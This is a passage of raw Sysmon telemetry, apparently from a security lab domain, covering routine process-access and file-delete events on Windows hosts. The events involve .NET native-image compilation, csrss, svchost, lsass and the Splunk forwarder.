Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=DB3944DA73A339856990FA171CEEE7ED,SHA256=B400AD4C19ADAE5186F766826C01A57806F724F5884A7642CD78AE66BABB321B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.388{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC24-607E-B00E-00000000BB01}1684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.388{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC24-607E-B00E-00000000BB01}1684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.388{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1008528368DAC661B5C9A424C4122E5,SHA256=9F85EB58681541E6FCC0155137581162D38B7B9E372C73F6ADAEF8722D6B8F91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.372{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=979F592C39E2FBB54945111C030AF686,SHA256=DB5CE800751DAC20025469D6E69E7A3BCD392935909DF4BFC66AA5928FC09EE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.372{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D34E3AC75F9689D36FDB50E75448A39,SHA256=EEBED23C8C2D7A2F3EBFE7EF6C0B8A368671976B98628D7CFD9B285BC7925F1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.372{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8EFC0D127F1464D8DDCF622127B4E33E,SHA256=53AABA5EE1CF13DFBBA77E75ED0812A5D6AA1DF752B54365436141056671230D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.372{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=3D933DBBA0EC66B2B5C93B3C98C14DAA,SHA256=81D7412A0682FD240B9F8FB320E7D63B7ACFA075C3192D5DA203332DE5A11927,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.372{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=9D4728437908B022E05D798DEA4F30C9,SHA256=1F3397F7725E3E28162C273C10C8361A6DF6EC0786D2D03581F64EFB32C56FF4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.341{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC24-607E-AF0E-00000000BB01}6964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.341{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC24-607E-AF0E-00000000BB01}6964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.341{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC24-607E-AF0E-00000000BB01}6964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.294{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC24-607E-AE0E-00000000BB01}888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.294{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC24-607E-AE0E-00000000BB01}888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.294{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC24-607E-AE0E-00000000BB01}888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.247{A7A01FEF-B624-607E-0B00-00000000BB01}8602300C:\Windows\system32\lsass.exe{A7A01FEF-EC23-607E-A70E-00000000BB01}944C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24cea|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.247{A7A01FEF-B624-607E-0B00-00000000BB01}8602300C:\Windows\system32\lsass.exe{A7A01FEF-EC23-607E-A70E-00000000BB01}944C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.247{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC24-607E-AD0E-00000000BB01}4668C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.232{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC24-607E-AD0E-00000000BB01}4668C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:44.232{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC24-607E-AD0E-00000000BB01}4668C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050579Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:44.204{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62A7E9BF817EFD5D617DB200FF707521,SHA256=53227507C4297A11F5C6ADAD19E32352DB14EF89820233CCD8234010F99F1111,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.950{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC25-607E-C40E-00000000BB01}5416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.950{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC25-607E-C40E-00000000BB01}5416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.950{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC25-607E-C40E-00000000BB01}5416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.888{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC25-607E-C30E-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.872{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC25-607E-C30E-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.872{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC25-607E-C30E-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.825{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC25-607E-C20E-00000000BB01}4232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows